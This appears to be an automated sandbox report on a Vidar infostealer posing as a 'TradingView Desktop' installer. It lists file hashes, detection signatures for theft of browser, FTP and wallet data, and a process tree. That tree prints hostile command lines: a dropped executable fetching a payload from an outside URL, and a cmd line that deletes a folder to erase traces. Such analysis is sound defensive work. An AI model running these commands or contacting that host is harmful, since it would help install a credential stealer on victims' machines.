Analysis
-
max time kernel
449s -
max time network
489s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
30-06-2024 18:06
Static task
static1
Behavioral task
behavioral1
Sample
DAC/bin/SqlPackage.exe
Resource
win11-20240611-en
General
-
Target
TradingView Desktop.exe
-
Size
779.2MB
-
MD5
e8fa1288bb7eeee03e51848faf7a5677
-
SHA1
17b3b9b521eae0935aa427ace0c273f3df733030
-
SHA256
5cc8741c9ab6011c21e2f485ee33e88d19954aa579dc0be2c64592c5392cbb05
-
SHA512
75aea3e803dfb34a8856204419742599b9411342ca7adf206126f4cc06c8e434764bdacaa33f353597e194799870adbbb4924dc17deee6f3c9cdce12bc67e140
-
SSDEEP
196608:nxO95CWNPkUhRJZPeKXXRWJbZd5d1dvbEGe5m+LjO:xSCWpJZPrnRWJFd5ndTEhjO
Malware Config
Signatures
-
Detect Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4140-2-0x0000000000770000-0x00000000019CA000-memory.dmp family_vidar_v7 -
Downloads MZ/PE file
-
Executes dropped EXE 11 IoCs
Processes:
HIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exeHIDGCF.exepid process 1832 HIDGCF.exe 2648 HIDGCF.exe 2320 HIDGCF.exe 2856 HIDGCF.exe 2516 HIDGCF.exe 760 HIDGCF.exe 3064 HIDGCF.exe 4560 HIDGCF.exe 2572 HIDGCF.exe 5028 HIDGCF.exe 3840 HIDGCF.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
TradingView Desktop.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TradingView Desktop.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TradingView Desktop.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3424 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
TradingView Desktop.exepid process 4140 TradingView Desktop.exe 4140 TradingView Desktop.exe 4140 TradingView Desktop.exe 4140 TradingView Desktop.exe 4140 TradingView Desktop.exe 4140 TradingView Desktop.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
TradingView Desktop.exeHIDGCF.execmd.exedescription pid process target process PID 4140 wrote to memory of 1832 4140 TradingView Desktop.exe HIDGCF.exe PID 4140 wrote to memory of 1832 4140 TradingView Desktop.exe HIDGCF.exe PID 1832 wrote to memory of 2320 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 2320 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 2648 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 2648 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 2516 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 2516 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 2856 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 2856 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 760 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 760 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 3064 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 3064 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 4560 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 4560 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 5028 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 5028 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 2572 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 2572 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 3840 1832 HIDGCF.exe HIDGCF.exe PID 1832 wrote to memory of 3840 1832 HIDGCF.exe HIDGCF.exe PID 4140 wrote to memory of 3784 4140 TradingView Desktop.exe cmd.exe PID 4140 wrote to memory of 3784 4140 TradingView Desktop.exe cmd.exe PID 4140 wrote to memory of 3784 4140 TradingView Desktop.exe cmd.exe PID 3784 wrote to memory of 3424 3784 cmd.exe timeout.exe PID 3784 wrote to memory of 3424 3784 cmd.exe timeout.exe PID 3784 wrote to memory of 3424 3784 cmd.exe timeout.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\TradingView Desktop.exe"C:\Users\Admin\AppData\Local\Temp\TradingView Desktop.exe"1⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\HIDGCF.exeC:\ProgramData\\HIDGCF.exe http://mamallan.life/new_clip.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\HIDGCF.exeC:\ProgramData\HIDGCF.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\HIDGCF.exeC:\ProgramData\HIDGCF.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\HIDGCF.exeC:\ProgramData\HIDGCF.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\HIDGCF.exeC:\ProgramData\HIDGCF.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\HIDGCF.exeC:\ProgramData\HIDGCF.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\HIDGCF.exeC:\ProgramData\HIDGCF.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\HIDGCF.exeC:\ProgramData\HIDGCF.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\HIDGCF.exeC:\ProgramData\HIDGCF.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\HIDGCF.exeC:\ProgramData\HIDGCF.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\HIDGCF.exeC:\ProgramData\HIDGCF.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJDBKKJKJEBF" & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\HIDGCF.exeFilesize
6KB
MD52890a00ef6943ed98e2b7c6e3e49ae1c
SHA19072a751e68fe39222aebc87ffb898a423310ce9
SHA2560ab41930f0a18d7629031bf5cd9a8c7090c13983c1d7567b9018185f0fa18f0d
SHA512dd01c349264e431f3ec900e05062fa4300a4f8a9219edf4f7f8014a92dadd4aae0f05cc4a103f30bdd4d9915460edb03769ffdff0c9e290acd4c89b3a16542fe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\PIYE1NLF\new_clip[1].exeFilesize
5.3MB
MD57cfdc2aee2ad1a7ef6f7715178aa8f93
SHA1fe57e4be70cf241a2c0cc2724088ae4c8830a816
SHA2563c352a7f11ef8cca36e6d1c8a940c6c9e5e60a7d3a07c3a464a7f1e3ce035b46
SHA5128be581dab7c20dbd95cc3987554ed5317e8dc9f22f26cfe353f1d4bc0590e767f321cda6987c2dcbdf1a7aba83cb3a2163c7cad8fcee7414c150bdf686d71469
-
memory/4140-2-0x0000000000770000-0x00000000019CA000-memory.dmpFilesize
18.4MB
-
memory/4140-16-0x0000000061E00000-0x0000000061EF3000-memory.dmpFilesize
972KB